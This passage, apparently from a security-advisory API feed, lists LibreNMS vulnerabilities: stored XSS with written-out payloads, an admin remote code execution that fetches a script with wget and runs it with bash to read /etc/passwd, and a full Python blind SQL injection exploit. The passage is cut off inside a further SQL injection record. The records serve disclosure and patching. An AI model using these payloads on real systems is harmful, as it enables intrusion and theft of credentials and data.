6.5.0","vulnerable_version_range":"\u003c= 26.4.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qbXFtLWY4cTQtdjd3eM4ABihH/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01Z205LTYyMmYtcWNnNc4ABXBI","url":"https://github.com/advisories/GHSA-5gm9-622f-qcg5","title":"LibreNMS: Cross-Site Scripting in ShowConfigController","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability exists in the ShowConfig page of devices affected by the RANCID Integration settings. The application fails to properly sanitise the `rancid_repo_url` configuration value. When a user navigates to a device's configuration page, this unsanitised value is rendered directly within an HTML anchor (\u0026lt;a\u0026gt;) tag. This allows an authenticated user with permission to modify external settings to inject malicious JavaScript that will execute in the browser of any user viewing the affected device pages.\n\n### Details\nThe vulnerability is located in the external settings configuration block, specifically at the settings/external/rancid endpoint. When a valid rancid_configs is set, the application renders the corresponding `rancid_repo_url` as a clickable link labeled \"Git Repository\" on the `/device/{id}/showconfig` UI.\n\nBecause the `rancid_repo_url` input is neither validated upon saving nor contextually encoded upon rendering, an attacker can break out of the `href` attribute context or use JavaScript URIs to attach malicious event handlers or scripts.\n\nThis vulnerability is introduced by the line 13 of https://github.com/librenms/librenms/blob/master/includes/html/pages/device/showconfig.inc.php.\n\n### PoC\n1. Login as an admin and navigate to `/settings/external/rancid`.\n\u003cimg width=\"790\" height=\"155\" alt=\"image\" src=\"https://github.com/user-attachments/assets/348fff1b-dfce-4735-9273-055113695368\" /\u003e\n\n2. Add a valid path to `rancid_configs`. This can be any directory ended with `.git`. \n3. Put `\"\u003e\u003c/a\u003e\u003cimg/src/onerror=alert(1)\u003e\u003ca x=\"` into `rancid_repo_url` config.\n\u003cimg width=\"909\" height=\"276\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b8c5d650-ba05-4326-8a2d-bea8defa7373\" /\u003e\n\n4. Navigate to a device page and click `Config` (Or visit `/device/{id}/showconfig` directly).\n5. The XSS is triggered when visiting the page. It will pop up an alert dialog.\n\u003cimg width=\"810\" height=\"454\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4d15784e-ff93-46ec-b13e-08a225a8d6d4\" /\u003e\n\n#### Other Payloads\n\n- `javascript:alert(1)\" x=\"` - triggered by clicking the link.\n- ``\" onmouseover=\"alert(1)\" x=\"` - triggered by hovering on the link\n\n### Impact\nSince an admin account is required to change the settings, the risk is minimal in systems with a single administrator. However, in environments with multiple administrative users, this constitutes an Admin-to-Admin Cross-Site Scripting attack. It could be used by a compromised admin account to execute arbitrary frontend code in the context of another administrator's session, potentially leading to session hijacking or unauthorized data exposure.\n\n### Remediation Advice\nEnsure proper sanitisation is performed on affected fields, with all special characters escaped and HTML encoded. This can be done with existing frameworks like HTMLPurifier.\n\n### CVE Request\nCVE References: https://projectblack.io/blog/librenms-authenticated-rce-and-xss/","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-05-18T17:00:49.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-5gm9-622f-qcg5","https://github.com/librenms/librenms/releases/tag/26.3.0","https://github.com/advisories/GHSA-5gm9-622f-qcg5"],"source_kind":"github","identifiers":["GHSA-5gm9-622f-qcg5","CVE-2026-2728"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-18T18:00:18.870Z","updated_at":"2026-09-03T00:02:18.915Z","epss_percentage":0.00225,"epss_percentile":0.13008,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Z205LTYyMmYtcWNnNc4ABXBI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01Z205LTYyMmYtcWNnNc4ABXBI","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.3.0","vulnerable_version_range":"\u003e= 25.12.0, \u003c 26.3.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Z205LTYyMmYtcWNnNc4ABXBI/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ycDd3LTYyNHgtOTVxds4ABVJZ","url":"https://github.com/advisories/GHSA-rp7w-624x-95qv","title":"Duplicate Advisory: LibreNMS affected by an authenticated Cross-site Scripting vulnerability on the showconfig page","description":"## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-5gm9-622f-qcg5. This link is maintained to preserve external references.\n\n## Original Description\nLibreNMS versions before 26.3.0 are affected by an authenticated Cross-site Scripting vulnerability on the showconfig page. Successful exploitation requires administrative privileges. Exploitation could result in XSS attacks being performed against other users with access to the page.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-13T12:31:15.000Z","withdrawn_at":"2026-05-12T13:39:51.000Z","classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2026-2728","https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#xss-on-showconfig-page-2630","https://github.com/advisories/GHSA-rp7w-624x-95qv"],"source_kind":"github","identifiers":["GHSA-rp7w-624x-95qv"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-14T23:00:11.535Z","updated_at":"2026-09-03T00:02:58.910Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycDd3LTYyNHgtOTVxds4ABVJZ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ycDd3LTYyNHgtOTVxds4ABVJZ","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.3.0","vulnerable_version_range":"\u003c 26.3.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycDd3LTYyNHgtOTVxds4ABVJZ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03NTQ5LWdncHEtMjJ3OM4ABVJc","url":"https://github.com/advisories/GHSA-7549-ggpq-22w8","title":"Duplicate Advisory: LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write","description":"## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-pr3g-phhr-h8fh. This link is maintained to preserve external references.\n\n## Original Description\nLibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-13T12:31:15.000Z","withdrawn_at":"2026-04-14T22:51:57.000Z","classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","references":["https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh","https://nvd.nist.gov/vuln/detail/CVE-2026-6204","https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc","https://github.com/advisories/GHSA-7549-ggpq-22w8"],"source_kind":"github","identifiers":["GHSA-7549-ggpq-22w8"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-14T23:00:11.535Z","updated_at":"2026-09-03T00:02:58.908Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NTQ5LWdncHEtMjJ3OM4ABVJc","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03NTQ5LWdncHEtMjJ3OM4ABVJc","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.3.0","vulnerable_version_range":"\u003c 26.3.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NTQ5LWdncHEtMjJ3OM4ABVJc/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wcjNnLXBoaHItaDhmaM4ABUUt","url":"https://github.com/advisories/GHSA-pr3g-phhr-h8fh","title":"LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write","description":"### Summary\nA vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads.\n\n### Details\nThe application allows administrative users to configure the absolute binary paths for network diagnostic tools at `/settings/external/binaries`. This setting does not sufficiently validate ensuring the paths remain restricted to safe, intended executables. These tools are invoked by sending a request to the `GET /ajax/netcmd` endpoint. While there is an existing input filter designed to restrict arguments to valid IP addresses or hostnames, this filter can be bypassed.\n\n### PoC\nTo reproduce this vulnerability, a remote HTTP server should be hosted with a malicious script/executable, ensure the remote server is reachable by the server running LibreNMS. The PoC will use the file `malicious.sh` containing the following content. It will return the content of /etc/passwd and /etc/group, current working directory, username that is running the script, and it will list files of the current directory.\n\n```bash\n#!/usr/bin/env bash\n\ncat /etc/passwd\ncat /etc/group\nwhoami\npwd\nls\n```\n\n1. Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost.\n\u003cimg width=\"593\" height=\"481\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef235f8e-089b-462c-b12c-7b5ae2037fc5\" /\u003e\n\n2. Make sure the malicious script `malicious.sh` can be downloaded. \n\u003cimg width=\"516\" height=\"100\" alt=\"image\" src=\"https://github.com/user-attachments/assets/60b04755-e824-4384-81f2-2feacdc8e273\" /\u003e\n\n3. Login with an admin account and navigate to Global Settings -\u003e External -\u003e Binary Locations\n\u003cimg width=\"797\" height=\"201\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f914cc9e-f45b-444f-8f16-058101d84576\" /\u003e\n\n4. Change the whois binary path to the path of wget (e.g. /usr/bin/wget).\n\u003cimg width=\"478\" height=\"58\" alt=\"image\" src=\"https://github.com/user-attachments/assets/57fbf033-ff07-41dc-9bac-2f3b3e897ea6\" /\u003e\n\n5. Send the request `GET /ajax/netcmd?cmd=whois\u0026query={remote http server's ip address}/malicious.sh`. The response should contain wget's output, and malicious.sh would be downloaded by the server.\n\u003cimg width=\"900\" height=\"209\" alt=\"image\" src=\"https://github.com/user-attachments/assets/942b6082-18db-4838-b06c-b98d7fa1f8d0\" /\u003e\n\n6. After that, change the whois binary path to the path of bash (e.g. /bin/bash). \n\u003cimg width=\"751\" height=\"56\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0c11d86e-0dab-4780-bdb7-f328bbb758f8\" /\u003e\n\n7. Send the request GET /ajax/netcmd?cmd=whois\u0026query=malicious.sh to execute the script. \n\u003cimg width=\"846\" height=\"688\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d4dcf8e9-5a75-407c-8dd4-96d11f090dbe\" /\u003e\n\n### Impact\nThis vulnerability allows a malicious actor to achieve Remote Code Execution (RCE), potentially leading to complete system compromise, data exfiltration, or lateral movement within the network.\n\n### Remediation Advice\nLoading Binary Path from a config file instead of exposing settings in WebUI can eliminate this issue. If it is not possible, enforcing more validations and fix the `ip_or_hostname` bypass in https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169 to reduce the risk of RCE.\n\n### Prerequisite\nThe attacker must have a valid Administrator account to exploit this vulnerability.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-26T18:04:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh","https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169","https://nvd.nist.gov/vuln/detail/CVE-2026-6204","https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc","https://github.com/advisories/GHSA-pr3g-phhr-h8fh"],"source_kind":"github","identifiers":["GHSA-pr3g-phhr-h8fh","CVE-2026-6204"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-26T19:00:09.001Z","updated_at":"2026-09-03T00:03:27.208Z","epss_percentage":0.07533,"epss_percentile":0.93725,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcjNnLXBoaHItaDhmaM4ABUUt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wcjNnLXBoaHItaDhmaM4ABUUt","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.3.0","vulnerable_version_range":"\u003e= 1.48, \u003c 26.3.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcjNnLXBoaHItaDhmaM4ABUUt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03OXE5LXdjNnAtY2Y5Ms4ABSge","url":"https://github.com/advisories/GHSA-79q9-wc6p-cf92","title":"LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php","description":"### Summary\nA time-based blind SQL injection vulnerability exists in `address-search.inc.php` via the `address` parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses.\n\n\n### Details\nThis vulnerability requires authentication and is exploitable by any authenticated user.\n\nThe vulnerable endpoint is at `/ajax_table.php` with the following request displaying the injection point.\n```\nPOST /ajax_table.php HTTP/1.1\nHost: 192.168.236.131\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: http://192.168.236.131\nConnection: keep-alive\nReferer: http://192.168.236.131/search\nCookie: laravel_session=[Authenticated user cookie]\n\ncurrent=1\u0026rowCount=55\u0026sort%5Bhostname%5D=asc\u0026searchPhrase=\u0026id=address-search\u0026search_type=ipv4\u0026device_id=1\u0026interface=\u0026address=127.0.0.1/aa\u003cinjected SQL here\u003e\n```\n\nWithin `includes/html/table/address-search.inc.php`, the user-controlled `$prefix` variable derived from the `address` parameter is concatenated directly into the SQL query without sanitization or parameter binding on lines 34 and 52.\n\n```php\n// Lines 16-35, 51-53\n$address = $vars['address'] ?? '';\n$prefix = '';\n$sort = trim((string) $sort);\n\nif (str_contains($address, '/')) {\n    [$address, $prefix] = explode('/', $address, 2);\n}\n\nif ($search_type == 'ipv4') {\n    $sql = ' FROM `ipv4_addresses` AS A, `ports` AS I, `devices` AS D';\n    $sql .= ' WHERE I.port_id = A.port_id AND I.device_id = D.device_id ' . $where . ' ';\n\n    if (! empty($address)) {\n        $sql .= ' AND ipv4_address LIKE ?';\n        $param[] = \"%$address%\";\n    }\n\n    if (! empty($prefix)) {\n        $sql .= \" AND ipv4_prefixlen='$prefix'\";\n    }\n\n......\n\n    if (! empty($prefix)) {\n        $sql .= \" AND ipv6_prefixlen = '$prefix'\";\n    }\n```\n\n\n### PoC\nThe following Python script exploits the time-based blind SQL injection vulnerability to retrieve the value of `SELECT CURRENT_USER()` from the database:\n```python\n#!/usr/bin/python3\n\nimport requests\nimport sys\nimport re\n\nfrom urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n# Configured to be used with burpsuite on the default burpsuite port of 8080\nproxies = {\"http\": \"http://127.0.0.1:8080\", \"https\": \"http://127.0.0.1:8080\"}\n\n# When None is returned it means that all values have been retrieved from the queried value in the target DB\ndef blind_binsearch_sqli(inj_str):\n    try:\n        a = range(32,126)\n        start = 0\n        end = len(a)\n        while start \u003c= end:\n            mid = (start + end) // 2\n            target_equal = inj_str.replace(\"[CHAR]\", str(a[mid]))\n            target_less = inj_str.replace(\"=[CHAR]\", f\"\u003c{a[mid]}\")\n\n            # Return ascii decimal value for storing to a local string buffer\n            if condition(target_equal):\n                return a[mid]\n            # Use lower half of the \"a\" array\n            elif condition(target_less):\n                end = mid - 1\n            # Use upper half of the \"a\" array\n            else:\n                start = mid + 1\n        return None\n    except IndexError:\n        return None\n\n\n# Check injection result\ndef condition(payload):\n    exploit_data = {\n    \"current\": \"1\",\n    \"rowCount\": \"50\",\n    \"sort[hostname]\": \"asc\",\n    \"searchPhrase\": \"\",\n    \"id\": \"address-search\",\n    \"search_type\": \"ipv4\",\n    \"device_id\": \"1\",\n    \"interface\": \"\",\n    \"address\": f\"127.0.0.1/aa{payload}\"\n    }\n    # Payload must be slotted in somewhere in this code\n    payload_url = f\"{url}/ajax_table.php\"\n\n    r = s.post(payload_url, data=exploit_data)\n\n    elapsed_time_seconds = r.elapsed.total_seconds()\n\n    # If response time is within sleep function delay range of +1 or -1 second the query returned \"true\"\n    if (elapsed_time_seconds + 1) \u003e (sleep_delay * 2) and (elapsed_time_seconds - 1) \u003c (sleep_delay * 2):\n        return True\n    else:\n        return False\n\n\ndef get_length(inj):\n    length = 0\n    print(f\"(+) Getting the length of \\\"{inj}\\\"\")\n    while True:\n        # MySQL\n        #length_injection_string = f\" AND LENGTH(({inj}))={str(length)}-- -\"\n        length_injection_string = f\"' AND (SELECT 1 FROM (SELECT IF(LENGTH(({inj}))={str(length)},SLEEP({sleep_delay}),0))x) AND '1'='1\"\n\n        bool_value = condition(length_injection_string)\n\n        if bool_value == False:\n            length += 1\n        else:\n            return length\n\n\ndef injection(inject_qry):\n    extracted = \"\"\n    length = get_length(inject_qry)\n    print(f\"Length of \\\"{inject_qry}\\\": {length}\")\n    print(f\"(+) Retrieving the value for \\\"{inject_qry}\\\"\")\n\n    # +2 to length in order to automatically stop the injection once the None value is returned, meaning that the whole query value is extracted\n    for i in range(1, length + 2):\n        # MySQL\n        injection_string = f\"' AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING(({inject_qry}),{i},1))=[CHAR],SLEEP({sleep_delay}),0))x) AND '1'='1\"\n\n        retrieved_value = blind_binsearch_sqli(injection_string)\n\n        if retrieved_value:\n            extracted += chr(retrieved_value)\n            extracted_char = chr(retrieved_value)\n            print(extracted_char, flush=True, end=\"\")\n        elif retrieved_value == None:\n            print(\"\\n(+) done!\\n\")\n            return extracted\n\nglobal url\nglobal s\nglobal sleep_delay\nglobal username\nglobal password\n\n# Default sleep delay, due to injection query used the response time will be sleep_delay * 2\nsleep_delay = 1.5\n\ns = requests.Session()\n\n# HTTPS\ns.verify = False\n\n# Toggle debug proxy\n#s.proxies.update(proxies)\n\nurl = \"http://192.168.236.131\"\n\nusername = \"tester2\"\npassword = \"Adminbazinga\"\n\nif len(sys.argv) \u003e 1:\n    url = sys.argv[1]\nif len(sys.argv) \u003e 2:\n    username = sys.argv[2]\nif len(sys.argv) \u003e 3:\n    password = sys.argv[3]\nif len(sys.argv) \u003e 4:\n    sleep_delay = float(sys.argv[4])\n\nr = s.get(url + \"/login\")\n\nlogin_token = re.search(r\"name=\\\"_token\\\"\\s+value=\\\"([^\\\"]+)\\\"\", r.text).group(1)\n\nlogin_data = {\n\"_token\": login_token,\n\"username\": username,\n\"password\": password,\n\"submit\": \"\"\n}\n\nr = s.post(url + \"/login\", data=login_data)\n\n# Example: python3 script.py http://127.0.0.1 username password 1.5\nif __name__ == \"__main__\":\n    injection(\"SELECT CURRENT_USER()\")\n```\n\nTester user role:\n\u003cimg width=\"771\" height=\"154\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fe13754c-9a41-48cb-934d-575097675c13\" /\u003e\n\n\nExample usage of PoC script:\n\u003cimg width=\"924\" height=\"104\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6b1e19a9-4c73-4e44-8e16-851ff92d5960\" /\u003e\n\n\n### Impact\n* Any authenticated user can exploit this vulnerability to extract sensitive information from the back-end database using time‑based blind SQL injection techniques.\n* This leads to unauthorised disclosure of database contents, including schema information and potentially sensitive application data.\n* An attacker can retrieve privileged accounts (e.g. administrative usernames) and their associated password hashes, potentially leading to privilege escalation within LibreNMS by cracking the password hashes and obtaining plaintext admin user credentials.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-02-18T22:31:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-79q9-wc6p-cf92","https://github.com/librenms/librenms/pull/18777","https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1","https://github.com/advisories/GHSA-79q9-wc6p-cf92"],"source_kind":"github","identifiers":["GHSA-79q9-wc6p-cf92","CVE-2026-26990"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-18T23:00:08.056Z","updated_at":"2026-09-03T00:04:11.206Z","epss_percentage":0.04054,"epss_percentile":0.89505,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OXE5LXdjNnAtY2Y5Ms4ABSge","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03OXE5LXdjNnAtY2Y5Ms4ABSge","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.2.0","vulnerable_version_range":"\u003c 26.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OXE5LXdjNnAtY2Y5Ms4ABSge/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02eG14LXhyOXAtNThwN84ABSgd","url":"https://github.com/advisories/GHSA-6xmx-xr9p-58p7","title":"LibreNMS has a Stored XSS in Alert Rule","description":"### Summary\nA stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (\u003c= 25.12.0) in the creation of Alert Rules. This allows a user with the admin role to inject malicious JavaScript, which will be executed when the alert rules page is viewed.\n\n### Details\nThe stored JavaScript is displayed at line 63 of `inlcudes/html/modal/alert_rule_list.inc.php`.\n```\n\u003ctd\u003e\u003ci\u003e\" . e($rule_display) . \"\u003c/i\u003e\u003c/td\u003e\n```\n\n### PoC\n\nRequest PoC:\n```\nPOST /alert-rule HTTP/1.1\nHost: 192.168.236.131\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRF-TOKEN: FaBY9sq0bzXpc3mlsvyRdvg0PLInwBXPnEhHNrZF\nX-Requested-With: XMLHttpRequest\nContent-Length: 718\nOrigin: http://192.168.236.131\nConnection: keep-alive\nReferer: http://192.168.236.131/device/device=1/tab=edit/section=alert-rules\nCookie: XSRF-TOKEN=eyJpdiI6ImhpdDNwV29nZE1lYzc0NGxyK2dGK2c9PSIsInZhbHVlIjoiUkpXUUlMYTZwT2VaZmNPZExKcHNLQWxwOFVjaGM3Z2hzNVBSa2thTEluSDdBL3Q0amVURGp1Q0tjYm15akw1QmJacDRqY3Y1eTNzS3l1VSsvcjVUaTRIalBKQzVpUlRySktLTHlnTHQxa29NNzlxaXMxQzdsalpUeDNaWTRKSjkiLCJtYWMiOiIwZGQ4ZmEzZmFmZTJkOGIyZWIxOGVhZjE0MTU4ZWI5ZjFlYTI0Y2NkNjcwYTU2Y2JkMTM5MDAxZDg1YWIzY2M5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVWbzBKRU9IaURzOUJ6OVNjREVGbFE9PSIsInZhbHVlIjoiRlJPckhRRG4yZjFiUjdGMlZTUXlhNXArT0pMcUdQY3RaV1EvRWJZdGNWUFUzYjhVaWxLS1hFclpacmFHOGQyNllFaGF1ckRYQWZKNHdzNEQ5RHFmdzh3WEY3UFZvdGlqc3RQVUc2Mk1QYTZ0c045YWt0TG0rS2ttU0ZpV3NQMXkiLCJtYWMiOiI1YWM1OWM5MGMwOTcyNDk2OTU1NTBlY2ExZjQ4M2M1YmQ3ZWFlNzQ5NDVmZTgxOTEyMjNkNjJhM2EzZjY1OWE5IiwidGFnIjoiIn0%3D\nPriority: u=0\n\n_token=FaBY9sq0bzXpc3mlsvyRdvg0PLInwBXPnEhHNrZF\u0026device_id=1\u0026device_name=127.0.0.1\u0026rule_id=\u0026builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22equal%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22xss%5C%22)%3C%2Fscript%3E%22%7D%5D%2C%22valid%22%3Atrue%7D\u0026name=Test+rule\u0026builder_rule_0_filter=access_points.accesspoint_id\u0026builder_rule_0_operator=equal\u0026builder_rule_0_value_0=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E\u0026severity=warning\u0026count=1\u0026delay=1m\u0026interval=5m\u0026recovery=on\u0026acknowledgement=on\u0026maps%5B%5D=1\u0026proc=\u0026notes=\u0026adv_query=\n```\n\nSteps to reproduce:\n1. Create and save an alert rule within a device with the following values:\n\u003cimg width=\"893\" height=\"325\" alt=\"image\" src=\"https://github.com/user-attachments/assets/33bdb9a6-7c6c-4fd4-9e8e-b845cf9600ea\" /\u003e\n\n2. Injected JavaScript is executed:\n\u003cimg width=\"1104\" height=\"565\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3d45c686-72e4-458a-93f6-e7fb749b966b\" /\u003e\n\n\n\n### Impact\nType: Stored Cross-Site Scripting (XSS)\nAffected users: Only accounts with the admin role which can edit a device's alert rules are affected.\nAttackers need: Authenticated admin-level access.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-02-18T22:30:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-6xmx-xr9p-58p7","https://github.com/librenms/librenms/pull/19039","https://github.com/librenms/librenms/commit/087608cf9f851189847cb8e8e5ad002e59170c58","https://github.com/librenms/librenms/releases/tag/26.2.0","https://nvd.nist.gov/vuln/detail/CVE-2026-26989","https://github.com/advisories/GHSA-6xmx-xr9p-58p7"],"source_kind":"github","identifiers":["GHSA-6xmx-xr9p-58p7","CVE-2026-26989"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-18T23:00:08.056Z","updated_at":"2026-09-03T00:04:11.206Z","epss_percentage":0.00238,"epss_percentile":0.14571,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02eG14LXhyOXAtNThwN84ABSgd","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02eG14LXhyOXAtNThwN84ABSgd","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"26.2.0","vulnerable_version_range":"\u003c= 25.12.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02eG14LXhyOXAtNThwN84ABSgd/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oM3J2LXE0cnEtcHFjds4ABSgc","url":"https://github.com/advisories/GHSA-h3rv-q4rq-pqcv","title":"LibreNMS: SQL Injection in ajax_table.php spreads through a covert data stream.","description":"### Summary\n*SQL Injection in IPv6 Address Search functionality via `address` parameter**\n\nA SQL injection vulnerability exists in the `ajax_table.php` endpoint. The application fails to properly sanitize or parameterize user input when processing IPv6 address searches. Specifically, the `address` parameter is split into an address and a prefix, and the prefix portion is directly concatenated into the SQL query string without validation. This allows an attacker to inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation.\n\n### Details\nThe vulnerability is located in the logic that handles address searching when `search_type` is set to `ipv6`.\n\nThe application takes the user-supplied `address` parameter and splits it using the `/` delimiter:\n```PHP\n[$address, $prefix] = explode('/', $vars['address']);\n```\nIf the search_type is ipv6 and the $prefix variable is not empty, the code constructs the SQL query by directly concatenating the $prefix variable into the string:\n```\n} elseif ($vars['search_type'] == 'ipv6') {\n    // ... code omitted ...\n    if (! empty($prefix)) {\n        // VULNERABILITY: Direct concatenation of user input\n        $sql .= \" AND ipv6_prefixlen = '$prefix'\";\n    }\n}\n```\nUnlike the ipv4 block, which attempts to use prepared statements (binding parameters via $param[]), the ipv6 block treats the prefix as a raw string. By supplying an input containing a /, an attacker can populate the $prefix variable. If this variable contains single quotes ('), it breaks out of the string literal in the SQL statement, enabling SQL injection.\n\nVulnerable Code Snippet:\n```\nif (! empty($prefix)) {\n    $sql .= \" AND ipv6_prefixlen = '$prefix'\";\n}\n```\n### PoC\nTo reproduce this vulnerability, an attacker can send a specially crafted HTTP POST request to the ajax_table.php endpoint.\n\nPayload breakdown:\n\n- search_type=ipv6: Forces the execution flow into the vulnerable elseif block.\n\n- address=snow/1nd'\":\n\n  - The explode function splits this into $address = 'snow' and $prefix = \"1nd'\"\".\n\n  - The SQL query becomes: ... AND 